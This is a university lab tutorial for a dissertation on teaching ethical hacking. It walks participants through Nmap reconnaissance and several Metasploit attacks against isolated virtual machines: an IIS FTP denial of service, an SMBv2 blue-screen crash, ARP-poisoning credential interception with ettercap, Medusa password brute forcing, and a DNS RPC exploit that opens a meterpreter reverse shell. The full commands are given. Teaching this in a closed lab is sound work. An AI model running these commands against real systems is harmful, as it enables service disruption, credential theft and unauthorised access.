UNIVERSITY OF DERBY

Hacking in Action Tutorial

Background Firstly, thank you for agreeing to participate in this tutorial. The results of this, as well as the survey which you will be asked to complete following this session, will contribute to a dissertation investigating the feasibility of using virtual environments to teach ethical hacking in educational institutions. Hacking is a very delicate subject when studying IT security; however it is suggested that the best defensive measures can be ensured by learning how to infiltrate and disrupt services,. Therefore this tutorial, although highly simplified, will put you in the seat of an ethical attacker who is employed to test the defensive measures in place on a corporate network. The purpose of this is to provide a conceptual understanding of both the mentality, and techniques used by an ethical hacker. The tutorial will begin by initiating four virtual machines found on the local computer. You will be using a well-recognized suite of tools used by professional security consultants which have been collated to form a Linux distribution known as BackTrack. Once all of the virtual machines have fully loaded, and you have logged into Back Track, you will use a tool known as Nmap to conduct reconnaissance on the local network in order to determine the IP (Internet Protocol) addresses of hosts connected to the local subnet. Nmap will also be used to discover the Operating System (OS) used by each host, and their respective services (indicated by banners and port numbers). Once the local network is mapped, and sufficient knowledge of each host is ascertained, you will move on to use the Metasploit Framework to conduct four attacks. These attacks will involve: Remotely executing a Denial of Service (DoS) attack on a File Transfer Protocol (FTP) server. Exploiting an out of bounds function table dereference in Server Message Block (SMB) requests causing a Blue Screen of Death (BSoD). Poisoning Address Resolution Protocol (ARP) requests in order to intercept Secure Sockets Layer (SSL) traffic and obtain a users credentials better known as a Man-in-the-Middle (MITM) attack.

1|P a g e

UNIVERSITY OF DERBY

Using a brute force tool to discover the password of an administrator account and then obtaining root access to that server by exploiting a stack buffer overflow in the Remote Procedure Call (RPC) interface of the Microsoft Domain Name System (DNS) service. The root access will then be used to launch a Virtual Network Computing (VNC) session.

This tutorial is designed to be enjoyable, but also educational, and you are reminded that it is a criminal offence to repeat these attacks without written authorisation from the organization, and individuals involved. Finally, due to the nature of this study, although the virtual machines are completely isolated and are unable to communicate with the University network or public network, there is monitoring software in use to ensure that any attempts to breach these security measures are logged.

2|P a g e

UNIVERSITY OF DERBY

Prelude To begin, please open the team of virtual machines in VMware Workstation: 1. Click the start Windows button. 2. Then go to Computer and open the root drive (C :\). Locate and open the StudentVMs folder, followed by STUART BUTCHER and finally, Hacking_Final

3. The Hacking_Final folder contains all of the virtual machines needed for this tutorial. Begin the tutorial by opening double clicking the Hacking_Final.vmtm file.

4. You will be greeted with VMware Workstation application displaying the Hacking_Final team tab. This contains all of the virtual machines.

3|P a g e

UNIVERSITY OF DERBY

5. With the team open, click Power on this team in the Commands box. This will start the boot up process.

The servers will start up in a particular order and take approximately 5 minutes before they are ready for use.

6. The virtual machines are ready for use when they display the Press Ctrl-Alt-Delete to logon screen.

To change between virtual machines, select them in the management panel above the console. Please be aware, if you are actively using the virtual machine, i.e. controlling its mouse, you will need to press CTRL + ALT to return to the host.

4|P a g e

UNIVERSITY OF DERBY

Reconnaissance The first task is to determine what else is on the local network and what each active host is responsible for. To do this, we will be using a tool known as Nmap included with BackTrack. 1. In the VMware Workstation window, take control of the ATTACKER virtual machine by selecting it from the management panel above the console. 2. Click the mouse anywhere on the virtual machine console window to take control of it. You will see a prompt bt login: at the bottom of the window. Type the username attacker and press return. You will be asked for the password, which is attacker.

You will not be able to see the password input. If you enter it incorrectly, you will need to repeat the process. 3. Following successful log on, the graphical user interface will

populate and a shell window will automatically appear.

5|P a g e

UNIVERSITY OF DERBY

4. If a shell window does not automatically appear, click the Konsole application icon on the bottom menu bar.

5. Before it is possible to discover other devices on the local subnet, the attacker needs to know what subnet they belong to. To do this, type ifconfig eth0 into the shell window. Press return.

6. Take a note of the IP address and subnet mask. 7. The local IP address is set to 172.172.1.10 with a subnet mask of 255.255.255.0. This means that the network address must be 172.172.1.0. Therefore to discover other devices within the subnet, type sudo nmap sP 172.172.1.0/24 into the shell window. The sudo command runs the command with administrative privileges and you may therefore be prompted for a password. If this happens, type attacker. Please note, all commands are case sensitive.

6|P a g e

UNIVERSITY OF DERBY

8. Nmap has revealed that there are three other clients on the local subnet (one of the hosts identified is BackTrack itself). a. 172.172.1.20 b. 172.172.1.100 c. 172.172.1.101 9. With the IP addressing information ascertained, it is now possible to acquire brief details of what services each host is responsible for. To do this, type sudo nmap v O {Target IP}

10. From the targeted scan, Nmap reveals the Operating System, network interface card MAC address, and open ports. The ports highlight the services running on the target. Repeat the scan for the remaining hosts.

Open Ports

Services used by ports Network Interface Card MAC Operating System Information

7|P a g e

UNIVERSITY OF DERBY

11. Although there is now a basic understanding of what ports and services are in use, it is possible to obtain more detailed information by interrogating services. For example, virtual machine with IP address 172.172.1.101 indicates it is running Internet Information Services (IIS) to power its web server, but it does not advertise which version. To discover the version of IIS, type sudo nmap A T4 F 172.172.1.101. Repeat the scan on the remaining hosts.

With some FTP servers, it is possible to gain specific system information by connecting to the server using Telnet and typing SYST.

8|P a g e

UNIVERSITY OF DERBY

Attacks With the knowledge now known about the other hosts on the local subnet, it is possible to find vulnerabilities on each. Discovered vulnerabilities are publicised on the National Vulnerability Database in an attempt to help administrators protect their systems and vendors to update their software. Information gathered about each host, and the potential vulnerabilities available to be exploited are shown below. 172.172.1.20 VICT-CLI01 This host is using Windows XP SP2 or SP3, which may make it vulnerable to relative path stack corruption on the Server service, which could result in obtaining root access, as described in CVE-2008-4250. 172.172.1.100 VICT-SRV01 172.172.1.100 appears to be responsible for DNS, Active Directory, web service, and email. It is also using the Windows Server 2003 Operating System. Therefore, this host may be vulnerable to an exploit of the RPC interface of the DNS service (CVE-20071748). Additionally, as this host also appears to be responsible for email services, it could be possible to conduct a Man-In-The-Middle attack on the secure HTTP traffic when a user logs in to their mailbox.

9|P a g e

UNIVERSITY OF DERBY

172.172.1.101 VICT-SRV-WEB1 This virtual machine appears to have two interesting services; FTP and HTTP. This suggests that the server is hosting one, or more, webpages as well as providing a download/upload service of files. Additionally, it is clear that the server is using a Server 2008 based Operating System.

As this host is using IIS 7.0, it is likely that the FTP server is using version 7.5. Therefore, it may be vulnerable to a Denial of Service attack as a result of a heap overflow. Further to this, Nmap has indicated that it is using SMB v2, which is known to be vulnerable to an array index error when an ampersand character is inputted into the Process ID field.

This triggers an attempted dereference of an out of bounds memory location, and consequently results in a Blue Screen of Death (CVE-2009-3103).

10 | P a g e

UNIVERSITY OF DERBY

IIS FTP 7.5 DoS It is possible to terminate the FTP service on a Windows server if they are running version 7.5. The vulnerability occurs when the FTP server attempts to encode a portion of overwritten FTP response when a string of 0xFF has been supplied; even past the end of the heap buffer, resulting in heap buffer overrun. This can be demonstrated in the Metasploit Framework. 1. Change control of the virtual machines to VICT-SRVWEB1. If control is currently focused on a different virtual machine, then press CTRL+ALT. This will return control to the host computer. 2. Login by hitting CTRL+ALT+INSERT and typing H4ckM3! as the password. 3. Once logged in, click the Start button and type services.msc into the search bar, followed by hitting the return key.

4. A window containing all system services will be populated. Scroll through the list of services to find Microsoft FTP Service. It will show the service as Started.

5. Change control back to the ATTACKER virtual machine and open a shell window.
11 | P a g e

UNIVERSITY OF DERBY

6. Verify that it is possible to connect to the FTP server by typing ftp 172.172.1.101. If the FTP server is running and accepting new connections then it will display the welcome banner (220 Microsoft FTP Service) and will prompt for a login name. 7. Hit return twice and then type quit.

8. Type sudo msfconsole. If prompted for a password, enter attacker. It may take a short while to load.

9. Select the exploit to be used by typing use auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof followed by hitting the return key. 10. Next, select the target by typing set RHOST 172.172.1.101. 11. Launch the attack by typing run.

12 | P a g e

UNIVERSITY OF DERBY

12. The attack will be launched. A completion message will be returned following the execution.

13. Change back to VICT-SRV-WEB1 and refresh the Services window. Do not close the shell window on BackTrack.

14. Find Microsoft FTP Service and notice that it is no longer Started.

The FTP service is no longer running. The attack has been successful. Server Message Block (SMB) Blue Screen of Death (BSoD) The reconnaissance also identified that VICT-SRV-WEB1 uses SMBv2, which has a known vulnerability. This vulnerability allows an attacker to execute code with systemlevel privileges. Failed exploit attempts result in Denial of Service conditions. This exploit involves purposely failing to execute code with system-level privileges. 1. On BackTrack, from the shell window used previously, type use

auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh. If you closed the shell window, open a new window and type sudo msfconsole to start Metasploit again. 2. Set the target by entering set RHOST {Target IP}. 3. Execute the attack by typing run.

4. When the attack completes, change to the VICT-SRV-WEB1 virtual machine.

13 | P a g e

UNIVERSITY OF DERBY

5. The virtual machine should be displaying a Blue Screen of Death. It is possible to see that the attack dereferenced of an out of bounds memory location by examining error. the

6. Return to the ATTACKER and type exit.

The victim will automatically reboot. The attack has been successful.

14 | P a g e

UNIVERSITY OF DERBY

Secure Sockets Layer (SSL) Man-in-the-Middle Attack Nmap revealed that there is an XP machine on the network. This is most likely a users computer. Nmap also identified 172.172.1.100 as the mail server. Therefore, it is possible to sniff traffic and poison ARP packets in order to intercept SSL data by acting as a middle-man. 1. Change control to VICT-CLI01 and press CTRL+ALT+INSERT. Enter thevictim as the username and Password01 as the

password.

2. Click the Start button and open Internet Explorer.

3. When the page begins to load, a security alert window will appear. Click View Certificate.

15 | P a g e

UNIVERSITY OF DERBY

4. The certificate will display three tabs, General, Details, and Certification Path. Open the Details tab.

5. The details tab contains all of the information relating to the site certificate. Take a note of the Issuer and information within the text box below.

6. Click OK and then click Yes on the security alert window.

16 | P a g e

UNIVERSITY OF DERBY

7. Enter the username thevictim and password Password01. Then click Log On.

8. The users inbox will now be displayed. Click Log Off and then close the window.

17 | P a g e

UNIVERSITY OF DERBY

10. Change control to the ATTACKER and from within a shell window type sudo ettercap Tq i eth0 M arp:remote,oneway /172.172.1.20/ /172.172.1.100/ . If prompted, enter the password attacker.

11. ARP requests are now being poisoned. Change back to VICT-CLI01. If the virtual machine is locked, and press CTRL+ALT+INSERT and type thevictim for the username and Password01 for the password. 12. Click the Start button and open Internet Explorer. When the

security alert window displays, click View Certificate. 13. Click the Details tab and take a note of the Issuer.

14. The

difference

in

issuer

demonstrates that SSL traffic is being intercepted. 15. Click OK and then Yes to continue loading the web page.

18 | P a g e

UNIVERSITY OF DERBY

16. Enter the username thevictim and password Password01 on the login page and then click Log On to load the users inbox. 17. Once successfully logged in, change control back to ATTACKER and notice the user details are printed to the display of the shell window.

18. In the shell window, type q and the sniffing and poisoning will terminate. 19. Return to VICT-CLI01 and click Log off. If the virtual machine is locked, enter thevictim as the username and Password01 as the password. 20. Shut down the VICT-CLI01 virtual machine by clicking the Start button and then Shut down. Click OK on the next window.

That concludes the Man-in-the-Middle attack.

19 | P a g e

UNIVERSITY OF DERBY

Domain Name System (DNS) Remote Procedure Call (RPC) Service Transmission Control Protocol (TCP) Overflow Nmap identified that server with IP address 172.172.1.100 is not only an e-mail server, but also responsible for the DNS and Active Directory. Unfortunately, Nmap also highlighted that the system is relatively unpatched and a known vulnerability to that particular OS (and service pack) involves causing a buffer overflow in the RPC interface of the DNS service. This is triggered when a long zone name parameter is supplied that contains escaped octal strings in a TCP packet. This will allow root access. However, in order to take control of the servers graphical user interface, the administrator credentials must be known. For this part, it is assumed that the administrator username is Administrator 1. On the ATTACKER machine, minimise the shell window if there is one open.

2. On the desktop, there is a file titled passwords. Click on it to open it. When prompted, click Open Session. 3. A text file containing a list of passwords will be displayed.

4. Close this window by clicking the X at the top right of the window.

5. Restore the shell window, or open a new one if there was not one already open.

20 | P a g e

UNIVERSITY OF DERBY

6. Start the brute forcing tool known as Medusa by typing medusa h 172.172.1.100 u Administrator P /home/attacker/passwords f F M smbnt followed by the return key.

7. Medusa will run through all of passwords in the password text file checking to see if there is a match. When it finds the correct one, it will display SUCCESS.

8. Take a note of the password and run Metasploit by typing sudo msfconsole. If prompted for the password, type attacker.

9. When Metasploit has loaded, type use exploit/windows/dcerpc/ms07_029_msdns_zonename and hit return. 10. Select the payload type to be used by typing set PAYLOAD

windows/meterpreter/reverse_tcp followed by the return key. 11. Define the source address to be used in the reverse Transmission Control Protocol (TCP) by typing set LHOST 172.172.1.10. 12. Enter the target

address by typing set RHOST 172.172.1.100. 13. Type exploit to execute the attack.

21 | P a g e

UNIVERSITY OF DERBY

14. If the attack is successful, a session with the server will be established. 15. To view the screen of the server type run getgui e.

16. Open a new shell window. When the prompt displays, type rdesktop u Adminsitrator p H4ckM3! 172.172.1.100 and press return.

17. Once logged in, click Start followed by Shut Down.

22 | P a g e

UNIVERSITY OF DERBY

18. It is not possible to shut the server down unless a comment is given. In the comment box, press space and then click OK.

19. The server will warn that other users will be disconnected. Click Yes to continue.

20. The server will now begin the shutdown process. Confirm this by changing control to the VICTSRV01 virtual machine. When the server shuts down, this attack is completed. In a production environment, the loss of the e-mail server and domain controller would result in major disruption to a business. Cleaning Up To complete the tutorial, shut down the remaining virtual machines: 1. Take control of VICT-SRV-WEB1 and pressing CTRL+ALT+INSERT to log in. Use the username Administrator and password H4ckM3! 2. If asked for a reason why the server unexpectedly shut down, hit the spacebar in the comments box followed by OK. 3. Once logged in, click the Start button followed by the right arrow button next to the padlock icon.

4. When Shut Down becomes visible, click it.

23 | P a g e

UNIVERSITY OF DERBY

5. If asked for a reason for shut down, press the spacebar in the comments box and click OK.

6. The server will begin the shutdown sequence. Change control to the ATTACKER virtual machine. 7. Close any shell windows that may be open, and click the far left icon on menu bar.

8. When the panel displays, click Log Out. Another window will appear. Click Log Out on this new window.

9. Once the graphical user interface has closed, click anywhere in the console window to ensure it is taking keyboard input. Type sudo poweroff.When prompted, enter the password attacker.

10. The system will now begin shutting down. When all virtual machines have shut down, the Hacking_Final home tab will be displayed in VMware Workstation. Thank you for taking part in this investigation. Please complete the online survey. The password for the survey is Attacker.
24 | P a g e